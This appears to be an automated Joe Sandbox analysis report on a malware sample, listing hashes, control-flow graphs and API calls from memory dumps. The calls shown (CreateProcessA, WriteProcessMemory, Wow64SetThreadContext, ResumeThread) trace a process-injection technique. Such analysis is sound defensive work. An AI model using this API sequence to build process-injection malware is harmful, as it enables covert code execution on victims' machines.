                                                                                                                              • Instruction ID: 7275530de6316e4e888afc315cf06831380a8791d7995e0e93f83b0c9f29709e
                                                                                                                              • Opcode Fuzzy Hash: 2c5d41f2d53a151cf07ab3705d102706d1ba11ce6371c3a701e989447764308b
                                                                                                                              • Instruction Fuzzy Hash: A351ED70D05208CBEB14EFA8D885BEEBBF2BB49300F209169D419BB395D7759982CF50
                                                                                                                              Function 00CBF2CF Relevance: .1, Instructions: 143COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 13a488b61455b0bac2da2ee9b6633a5f9a18f65f7731a0261e7c0adc1b898aa0
                                                                                                                              • Instruction ID: ac227cd037c9ae64b49aa9d6b193f9aef1954e2de319b0b7d47d424a8b534855
                                                                                                                              • Opcode Fuzzy Hash: 13a488b61455b0bac2da2ee9b6633a5f9a18f65f7731a0261e7c0adc1b898aa0
                                                                                                                              • Instruction Fuzzy Hash: B3513670D05208DBEB14EFA9D8857EEB7F2BB88300F249129D414BB399DB759982CF54

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.7%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:139
                                                                                                                              Total number of Limit Nodes:17
                                                                                                                              execution_graph 40661 bb91a48 40662 bb91bd3 40661->40662 40663 bb91a6e 40661->40663 40663->40662 40666 bb91cc8 PostMessageW 40663->40666 40668 bb91cc1 PostMessageW 40663->40668 40667 bb91d34 40666->40667 40667->40663 40669 bb91d34 40668->40669 40669->40663 40488 76c29a8 40489 76c29e2 40488->40489 40490 76c2a5e 40489->40490 40491 76c2a73 40489->40491 40496 76c11fc 40490->40496 40493 76c11fc 3 API calls 40491->40493 40495 76c2a82 40493->40495 40498 76c1207 40496->40498 40497 76c2a69 40498->40497 40501 76c3468 40498->40501 40507 76c3457 40498->40507 40513 76c1254 40501->40513 40503 76c348f 40503->40497 40505 76c34b8 CreateIconFromResourceEx 40506 76c3536 40505->40506 40506->40497 40508 76c1254 CreateIconFromResourceEx 40507->40508 40510 76c3482 40507->40510 40508->40510 40509 76c348f 40509->40497 40510->40509 40511 76c34b8 CreateIconFromResourceEx 40510->40511 40512 76c3536 40511->40512 40512->40497 40514 76c34b8 CreateIconFromResourceEx 40513->40514 40515 76c3482 40514->40515 40515->40503 40515->40505 40516 16e4668 40517 16e4672 40516->40517 40519 16e4758 40516->40519 40520 16e477d 40519->40520 40524 16e4868 40520->40524 40528 16e4859 40520->40528 40521 16e4787 40521->40517 40526 16e488f 40524->40526 40525 16e496c 40525->40521 40526->40525 40532 16e4514 40526->40532 40530 16e488f 40528->40530 40529 16e496c 40529->40521 40530->40529 40531 16e4514 CreateActCtxA 40530->40531 40531->40529 40533 16e58f8 CreateActCtxA 40532->40533 40535 16e59bb 40533->40535 40554 16ed588 DuplicateHandle 40555 16ed61e 40554->40555 40556 bb9081e 40557 bb907ac 40556->40557 40559 bb90821 40556->40559 40558 bb907da 40557->40558 40572 bb91399 40557->40572 40576 bb91245 40557->40576 40580 bb90f03 40557->40580 40584 bb90b20 40557->40584 40591 bb9148f 40557->40591 40594 bb90dcd 40557->40594 40598 bb911cb 40557->40598 40604 bb90e16 40557->40604 40608 bb90cf0 40557->40608 40615 bb9107c 40557->40615 40619 bb90f9c 40557->40619 40623 bb90d9d 40557->40623 40574 bb91093 40572->40574 40573 bb913ad 40574->40572 40574->40573 40627 76be810 40574->40627 40577 bb90e31 40576->40577 40578 bb90e46 40576->40578 40631 76be190 40577->40631 40578->40558 40581 bb90dd6 40580->40581 40583 76be810 WriteProcessMemory 40581->40583 40582 bb90fd0 40582->40558 40583->40582 40586 bb90b25 40584->40586 40585 bb90c15 40585->40558 40586->40585 40635 76bea98 40586->40635 40587 bb90d32 40588 bb90d97 40587->40588 40589 76be900 ReadProcessMemory 40587->40589 40588->40558 40589->40588 40639 76be750 40591->40639 40595 bb90dd6 40594->40595 40597 76be810 WriteProcessMemory 40595->40597 40596 bb90fd0 40596->40558 40597->40596 40599 bb9160b 40598->40599 40601 bb90d97 40598->40601 40647 76be678 40599->40647 40601->40558 40605 bb90e20 40604->40605 40607 76be190 ResumeThread 40605->40607 40606 bb90e46 40606->40558 40607->40606 40610 bb90c08 40608->40610 40609 bb90c15 40609->40558 40610->40609 40613 76bea98 CreateProcessA 40610->40613 40611 bb90d32 40612 bb90d97 40611->40612 40614 76be900 ReadProcessMemory 40611->40614 40612->40558 40613->40611 40614->40612 40616 bb91082 40615->40616 40617 bb913ad 40616->40617 40618 76be810 WriteProcessMemory 40616->40618 40618->40616 40620 bb91458 40619->40620 40621 bb90fa6 40619->40621 40622 76be678 Wow64SetThreadContext 40620->40622 40621->40558 40622->40621 40624 bb90dc0 40623->40624 40626 76be810 WriteProcessMemory 40624->40626 40625 bb9111d 40625->40558 40626->40625 40628 76be858 WriteProcessMemory 40627->40628 40630 76be8af 40628->40630 40630->40574 40632 76be1d0 ResumeThread 40631->40632 40634 76be201 40632->40634 40634->40578 40636 76beb21 CreateProcessA 40635->40636 40638 76bece3 40636->40638 40640 76be790 VirtualAllocEx 40639->40640 40642 76be7cd 40640->40642 40643 76be900 40644 76be94b ReadProcessMemory 40643->40644 40646 76be98f 40644->40646 40646->40601 40648 76be6bd Wow64SetThreadContext 40647->40648 40650 76be705 40648->40650 40650->40601 40650->40643 40536 76cc9b0 40537 76cc9fe DrawTextExW 40536->40537 40539 76cca56 40537->40539 40540 16eafb0 40541 16eafbf 40540->40541 40544 16eb0a8 40540->40544 40549 16eb098 40540->40549 40545 16eb0b9 40544->40545 40546 16eb0dc 40544->40546 40545->40546 40547 16eb2e0 GetModuleHandleW 40545->40547 40546->40541 40548 16eb30d 40547->40548 40548->40541 40550 16eb0dc 40549->40550 40551 16eb0b9 40549->40551 40550->40541 40551->40550 40552 16eb2e0 GetModuleHandleW 40551->40552 40553 16eb30d 40552->40553 40553->40541 40651 16ed340 40652 16ed386 GetCurrentProcess 40651->40652 40654 16ed3d8 GetCurrentThread 40652->40654 40657 16ed3d1 40652->40657 40655 16ed415 GetCurrentProcess 40654->40655 40658 16ed40e 40654->40658 40656 16ed44b 40655->40656 40659 16ed473 GetCurrentThreadId 40656->40659 40657->40654 40658->40655 40660 16ed4a4 40659->40660

                                                                                                                              Executed Functions

                                                                                                                              Function 016ED330 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 016ED3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 016ED491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 261f937b9fcb3b9ad4800118ce4f8f252b69420f1ba44e2c03507cae01e52272
                                                                                                                              • Instruction ID: 7f7314fcd155f4c504c13c224d6fd296dd7932c11f86b954092e448f8629fced
                                                                                                                              • Opcode Fuzzy Hash: 261f937b9fcb3b9ad4800118ce4f8f252b69420f1ba44e2c03507cae01e52272
                                                                                                                              • Instruction Fuzzy Hash: 9C5156B0901349CFEB14DFA9D9487DEBBF1BF88304F248459D519AB3A0DB34A944CB65
                                                                                                                              Function 016ED340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 016ED3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 016ED438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 016ED491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 9ab119b926b4bb8cd400b05480fe86243837651c9241b99b0b71111ca602a3a6
                                                                                                                              • Instruction ID: cd86e70ff49beaa7bfff67cfab9df2d21ba7a0012a2ffc10d3c4ed638efe4b11
                                                                                                                              • Opcode Fuzzy Hash: 9ab119b926b4bb8cd400b05480fe86243837651c9241b99b0b71111ca602a3a6
                                                                                                                              • Instruction Fuzzy Hash: C65145B0901349CFDB14DFAAD948BDEBBF1BB88314F208459E519A7360D734A944CB65
                                                                                                                              Function 076BEA98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 45 76bea98-76beb2d 47 76beb2f-76beb39 45->47 48 76beb66-76beb86 45->48 47->48 49 76beb3b-76beb3d 47->49 53 76beb88-76beb92 48->53 54 76bebbf-76bebee 48->54 51 76beb3f-76beb49 49->51 52 76beb60-76beb63 49->52 55 76beb4b 51->55 56 76beb4d-76beb5c 51->56 52->48 53->54 58 76beb94-76beb96 53->58 62 76bebf0-76bebfa 54->62 63 76bec27-76bece1 CreateProcessA 54->63 55->56 56->56 57 76beb5e 56->57 57->52 59 76bebb9-76bebbc 58->59 60 76beb98-76beba2 58->60 59->54 64 76beba6-76bebb5 60->64 65 76beba4 60->65 62->63 66 76bebfc-76bebfe 62->66 76 76becea-76bed70 63->76 77 76bece3-76bece9 63->77 64->64 67 76bebb7 64->67 65->64 68 76bec21-76bec24 66->68 69 76bec00-76bec0a 66->69 67->59 68->63 71 76bec0e-76bec1d 69->71 72 76bec0c 69->72 71->71 73 76bec1f 71->73 72->71 73->68 87 76bed72-76bed76 76->87 88 76bed80-76bed84 76->88 77->76 87->88 89 76bed78 87->89 90 76bed86-76bed8a 88->90 91 76bed94-76bed98 88->91 89->88 90->91 92 76bed8c 90->92 93 76bed9a-76bed9e 91->93 94 76beda8-76bedac 91->94 92->91 93->94 95 76beda0 93->95 96 76bedbe-76bedc5 94->96 97 76bedae-76bedb4 94->97 95->94 98 76beddc 96->98 99 76bedc7-76bedd6 96->99 97->96 99->98
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076BECCE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: c6870d5a18a54ea35dfd0afbaf69aa131fe96afb2311beeddad0463adbc32b9b
                                                                                                                              • Instruction ID: c69d022d8c7db68993d823a9a0b5c35ac08c8c04fd67c4068201269ca10c10c2
                                                                                                                              • Opcode Fuzzy Hash: c6870d5a18a54ea35dfd0afbaf69aa131fe96afb2311beeddad0463adbc32b9b
                                                                                                                              • Instruction Fuzzy Hash: 31917EB1D0021ADFEF20DF68C841BEDBBB2BF45310F1485A9D81AA7240DB759985CF91
                                                                                                                              Function 016EB0A8 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 101 16eb0a8-16eb0b7 102 16eb0b9-16eb0c6 call 16ead38 101->102 103 16eb0e3-16eb0e7 101->103 109 16eb0dc 102->109 110 16eb0c8 102->110 105 16eb0fb-16eb13c 103->105 106 16eb0e9-16eb0f3 103->106 112 16eb13e-16eb146 105->112 113 16eb149-16eb157 105->113 106->105 109->103 157 16eb0ce call 16eb340 110->157 158 16eb0ce call 16eb330 110->158 112->113 114 16eb17b-16eb17d 113->114 115 16eb159-16eb15e 113->115 120 16eb180-16eb187 114->120 117 16eb169 115->117 118 16eb160-16eb167 call 16ead44 115->118 116 16eb0d4-16eb0d6 116->109 119 16eb218-16eb2d8 116->119 122 16eb16b-16eb179 117->122 118->122 152 16eb2da-16eb2dd 119->152 153 16eb2e0-16eb30b GetModuleHandleW 119->153 123 16eb189-16eb191 120->123 124 16eb194-16eb19b 120->124 122->120 123->124 125 16eb19d-16eb1a5 124->125 126 16eb1a8-16eb1b1 call 16ead54 124->126 125->126 132 16eb1be-16eb1c3 126->132 133 16eb1b3-16eb1bb 126->133 134 16eb1c5-16eb1cc 132->134 135 16eb1e1-16eb1ee 132->135 133->132 134->135 137 16eb1ce-16eb1de call 16ead64 call 16ead74 134->137 142 16eb1f0-16eb20e 135->142 143 16eb211-16eb217 135->143 137->135 142->143 152->153 154 16eb30d-16eb313 153->154 155 16eb314-16eb328 153->155 154->155 157->116 158->116
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016EB2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 2f002711fbc15f627f2e4a9147485c73e3ba489d74dd33aee035c11348a6d7f7
                                                                                                                              • Instruction ID: 4f019f74e03da587cfe390a0afe2dcbdc52be018eff93a6889617782deb2b758
                                                                                                                              • Opcode Fuzzy Hash: 2f002711fbc15f627f2e4a9147485c73e3ba489d74dd33aee035c11348a6d7f7
                                                                                                                              • Instruction Fuzzy Hash: 1F714770A01B058FE725DF6AD84475ABBF2FF88210F008A2DD146DBB50D775E945CB91
                                                                                                                              Function 016E58ED Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 159 16e58ed-16e59b9 CreateActCtxA 161 16e59bb-16e59c1 159->161 162 16e59c2-16e5a1c 159->162 161->162 169 16e5a1e-16e5a21 162->169 170 16e5a2b-16e5a2f 162->170 169->170 171 16e5a40 170->171 172 16e5a31-16e5a3d 170->172 174 16e5a41 171->174 172->171 174->174
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 016E59A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: f3f521ec7b771b71495ba12f8c783f4d898d0bfa74a3e8177e7f2ca0e1de7ac1
                                                                                                                              • Instruction ID: 4da3bef0a8ed25a2587713a16454016f95e410da52be1f2312d4bc8d6103defb
                                                                                                                              • Opcode Fuzzy Hash: f3f521ec7b771b71495ba12f8c783f4d898d0bfa74a3e8177e7f2ca0e1de7ac1
                                                                                                                              • Instruction Fuzzy Hash: B241D174D00719CFDB24DFAAC844ADEBBF5BF84304F20815AD409AB251DB756946CF90
                                                                                                                              Function 016E4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 175 16e4514-16e59b9 CreateActCtxA 178 16e59bb-16e59c1 175->178 179 16e59c2-16e5a1c 175->179 178->179 186 16e5a1e-16e5a21 179->186 187 16e5a2b-16e5a2f 179->187 186->187 188 16e5a40 187->188 189 16e5a31-16e5a3d 187->189 191 16e5a41 188->191 189->188 191->191
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 016E59A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 8a47af3c84aec1ddf523c877cf65a7c61507d906e284ed997fded83d67234f0d
                                                                                                                              • Instruction ID: b61fb10046371fb54daacc71d41d25ba33c0f8f31fe4ad8f44c27a31b357fce8
                                                                                                                              • Opcode Fuzzy Hash: 8a47af3c84aec1ddf523c877cf65a7c61507d906e284ed997fded83d67234f0d
                                                                                                                              • Instruction Fuzzy Hash: 6E41CF74C0071DCBDB24DFAAC844B8EBBF5BF89304F20816AD409AB251DB75A946CF90
                                                                                                                              Function 076C3468 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 192 76c3468-76c348d call 76c1254 195 76c348f-76c349f 192->195 196 76c34a2-76c3534 CreateIconFromResourceEx 192->196 201 76c353d-76c355a 196->201 202 76c3536-76c353c 196->202 202->201
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: 1c01df0418628e55305f8cc5731ec4c64a862bc8492414e0389ecba6c3e78403
                                                                                                                              • Instruction ID: 595ea1e5e4e98af56dadd1baa39af590d7d0c516452fc716180955c47ef74e8d
                                                                                                                              • Opcode Fuzzy Hash: 1c01df0418628e55305f8cc5731ec4c64a862bc8492414e0389ecba6c3e78403
                                                                                                                              • Instruction Fuzzy Hash: 73319EB1904399EFCB11CFAAD844AEABFF8EF49310F14805AE654AB351C3359850DFA1
                                                                                                                              Function 076CC9A8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 205 76cc9a8-76cc9fc 207 76cc9fe-76cca04 205->207 208 76cca07-76cca16 205->208 207->208 209 76cca18 208->209 210 76cca1b-76cca54 DrawTextExW 208->210 209->210 211 76cca5d-76cca7a 210->211 212 76cca56-76cca5c 210->212 212->211
                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076CCA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0
                                                                                                                              • Opcode ID: 1cca0af5db081b6bba6cbcaf5546ca3ac1e6bfd149bcf29f157c72eb75aad0ad
                                                                                                                              • Instruction ID: 128ef8871408dd9fbaf38765976edf29c78dc8641816e8c2cbefaa658ab4c54a
                                                                                                                              • Opcode Fuzzy Hash: 1cca0af5db081b6bba6cbcaf5546ca3ac1e6bfd149bcf29f157c72eb75aad0ad
                                                                                                                              • Instruction Fuzzy Hash: 4131E4B59002499FDB10CF9AD884AEEFBF5FB48324F14842EE519A7710D775A540CFA4
                                                                                                                              Function 076CC9B0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 225 76cc9b0-76cc9fc 226 76cc9fe-76cca04 225->226 227 76cca07-76cca16 225->227 226->227 228 76cca18 227->228 229 76cca1b-76cca54 DrawTextExW 227->229 228->229 230 76cca5d-76cca7a 229->230 231 76cca56-76cca5c 229->231 231->230
                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076CCA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543965316.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76c0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0
                                                                                                                              • Opcode ID: 652928e425804cd7159898f907b2b41aba21e2cc9b6757bf6fd0381091321c90
                                                                                                                              • Instruction ID: e4fd4d4a8c299605b84d1cdb8e0504d05c4f8f5bff835113b8678af44572175b
                                                                                                                              • Opcode Fuzzy Hash: 652928e425804cd7159898f907b2b41aba21e2cc9b6757bf6fd0381091321c90
                                                                                                                              • Instruction Fuzzy Hash: 8121C2B59002499FDB10CF9AD884AAEBBF5EB48324F14842EE519A7710D774A544CFA4
                                                                                                                              Function 076BE810 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 215 76be810-76be85e 217 76be86e-76be8ad WriteProcessMemory 215->217 218 76be860-76be86c 215->218 220 76be8af-76be8b5 217->220 221 76be8b6-76be8e6 217->221 218->217 220->221
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076BE8A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: f544f14bb4bbbed0ba72e2bd4c2675d228573bea56f0104002962d8a7bb06023
                                                                                                                              • Instruction ID: 89f7de7d094a6eab5936fae44ed5840febddaff10f90306467396cc490049c22
                                                                                                                              • Opcode Fuzzy Hash: f544f14bb4bbbed0ba72e2bd4c2675d228573bea56f0104002962d8a7bb06023
                                                                                                                              • Instruction Fuzzy Hash: C42136B1D003599FDB10DFAAC881BDEBBF5FF88310F14842AE919A7240C7799950CBA4
                                                                                                                              Function 076BE678 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 234 76be678-76be6c3 236 76be6d3-76be703 Wow64SetThreadContext 234->236 237 76be6c5-76be6d1 234->237 239 76be70c-76be73c 236->239 240 76be705-76be70b 236->240 237->236 240->239
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076BE6F6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              • Opcode ID: 74436999a5eedf86c306416eb288beb633e0cfc5b0e533b0264c30c9bc0bf168
                                                                                                                              • Instruction ID: 2c7ae53d870a7de5322daeee4dfde9e1541490f0c7d4b46d6b073c5445e9acfa
                                                                                                                              • Opcode Fuzzy Hash: 74436999a5eedf86c306416eb288beb633e0cfc5b0e533b0264c30c9bc0bf168
                                                                                                                              • Instruction Fuzzy Hash: 7B214CB1D003099FDB10DFAAC4857EEBBF4EF88314F148429D519A7241D7799544CFA4
                                                                                                                              Function 076BE900 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 244 76be900-76be98d ReadProcessMemory 247 76be98f-76be995 244->247 248 76be996-76be9c6 244->248 247->248
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076BE980
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2543892244.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_76b0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              • Opcode ID: ef986e817bcef216dc2c7e75a34c388918fe35335d170f599518938b96a878cd
                                                                                                                              • Instruction ID: c929bc53a6a9c6ed19800eff5f1383384c0bffaff9acad6166cbbc59e32de974
                                                                                                                              • Opcode Fuzzy Hash: ef986e817bcef216dc2c7e75a34c388918fe35335d170f599518938b96a878cd
                                                                                                                              • Instruction Fuzzy Hash: D02128B1C003599FDB10DFAAC881ADEFBF5FF48310F108429E559A7250C7399944CBA4
                                                                                                                              Function 016ED588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 252 16ed588-16ed61c DuplicateHandle 253 16ed61e-16ed624 252->253 254 16ed625-16ed642 252->254 253->254
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016ED60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: c2fbb0f06e85611b8b234dd7b7571ce4f58dccf23accaf6f7295b403ba7133e0
                                                                                                                              • Instruction ID: 2737da574af2de3b3a7251f239a9d5b92d8fc60e7c9c9ef6f88a97de7116f498
                                                                                                                              • Opcode Fuzzy Hash: c2fbb0f06e85611b8b234dd7b7571ce4f58dccf23accaf6f7295b403ba7133e0
                                                                                                                              • Instruction Fuzzy Hash: 7F21E4B59002599FDB10CF9AD984ADEBFF4EB48314F14841AE918A3350D378A954CFA5
                                                                                                                              Function 016ED581 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 257 16ed581 258 16ed58d-16ed61c DuplicateHandle 257->258 259 16ed61e-16ed624 258->259 260 16ed625-16ed642 258->260 259->260
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016ED60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000A.00000002.2538526807.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_10_2_16e0000_FZcXKpA.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
